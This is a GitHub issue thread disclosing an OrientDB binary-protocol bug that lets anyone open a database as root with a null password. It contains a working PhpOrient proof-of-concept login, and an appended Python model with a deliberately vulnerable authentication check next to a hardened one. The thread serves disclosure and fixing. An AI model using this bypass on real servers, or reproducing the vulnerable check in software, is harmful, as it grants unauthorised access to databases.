security issue in binary protocol
Hi, I am having quite a security issue in the binary protocol in REQUEST_DB_OPEN. By setting user-name to "root" and user-password to 4 bytes 0xFF, the db is opened regardless of what the real root password is.
This can be reproduced by using the PhpOrient driver and the following code:
require 'PhpOrient/vendor/autoload.php';
use PhpOrient\PhpOrient;

// Connect to the binary protocol port (2424 is the default).
$client = new PhpOrient( 'localhost', 2424 );
// Open the database as "root" with a null password; the real root password is never supplied.
$client->dbOpen('GratefulDeadConcerts', 'root', null);
print_r($client->query( 'select from V' ));
I can use both null or an empty string "" as password here without knowing the real root password. PhpOrient transfers an empty password as pack('N', -1), which results in 4 bytes 0xFF. This only works with "root"; any other user (e.g. "admin") requires the proper password.
I posted this here since I think this is an issue in the binary protocol and not in PhpOrient. Is my configuration somehow wrong or can anybody confirm this behaviour? I tried this both with OrientDB 2.0.8 and 2.1-rc2.
Top GitHub Comments
Thank you for the confirmation. @lvca So this is pretty serious, right? I narrowed the problem down to line 464 in OServer.java:
iPassword == null
I can't believe this! What kind of backdoor is that? I hope this is by design and the null password should be prevented on a higher level in the binary protocol.

Thanks @micha-nerdlichter for the report. We'll release 2.0.10 and 2.1-rc3 asap.
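As an added illustration (not code from OrientDB, PhpOrient, or any participant in this thread), the following Python models the two points the thread makes: how PhpOrient's pack('N', -1) turns an empty or missing password into the binary protocol's null-string marker (4-byte big-endian length, with -1 meaning null, as the OrientDB binary protocol encodes strings), and how a server-side check of the shape iPassword == null turns that marker into a root login without any password. The user table, the passwords, and the two authenticate functions are constructed assumptions that stand in for OServer.java; they are not its code.

```python
import hmac
import struct

# Constructed sample user table. Not real credentials.
USERS = {"root": "correct-horse", "admin": "battery-staple"}


def encode_string(value):
    """Encode a protocol string: 4-byte big-endian signed length, then UTF-8 bytes.

    A null string is sent as length -1 with no payload, which is exactly the
    four 0xFF bytes the reporter observed coming out of PhpOrient's pack('N', -1).
    """
    if value is None:
        return struct.pack(">i", -1)
    data = value.encode("utf-8")
    return struct.pack(">i", len(data)) + data


def decode_string(buf, offset=0):
    """Decode one protocol string at offset; return (value_or_None, new_offset)."""
    (length,) = struct.unpack_from(">i", buf, offset)
    offset += 4
    if length < 0:
        return None, offset  # the null marker, not an empty string
    return buf[offset:offset + length].decode("utf-8"), offset + length


def phporient_password_field(password):
    """Mimic what the report says PhpOrient sends: an empty or missing password
    is transferred as pack('N', -1). PHP's 'N' is unsigned, so -1 wraps to 0xFFFFFFFF."""
    if not password:  # None and "" both collapse to the null marker
        return struct.pack(">I", 0xFFFFFFFF)
    return encode_string(password)


def vulnerable_authenticate(users, user, password):
    """Hypothetical model of the check the second comment points at (iPassword == null):
    a null password skips verification for root, which is the reported bypass."""
    if user not in users:
        return False
    if user == "root" and password is None:
        return True
    return password is not None and password == users[user]


def hardened_authenticate(users, user, password):
    """A null or empty password is a failed login for every user, never a bypass."""
    if user not in users or not password:
        return False
    return hmac.compare_digest(password.encode("utf-8"), users[user].encode("utf-8"))


def authenticate_from_wire(users, user, wire_password, check):
    """Decode the password field as the server would, then run the given check."""
    password, _ = decode_string(wire_password)
    return check(users, user, password)


if __name__ == "__main__":
    field = phporient_password_field(None)
    print("wire password field:", field.hex())  # ffffffff
    print("vulnerable, root  :", authenticate_from_wire(USERS, "root", field, vulnerable_authenticate))
    print("vulnerable, admin :", authenticate_from_wire(USERS, "admin", field, vulnerable_authenticate))
    print("hardened, root    :", authenticate_from_wire(USERS, "root", field, hardened_authenticate))
```

Two things compose into the bypass here: the client collapses "" into the null marker, and the server treats null as "skip the comparison" for root. Either side alone would be a bug; together they are an authentication bypass, which is why the hardened check refuses both null and empty passwords instead of relying on the driver to never send them.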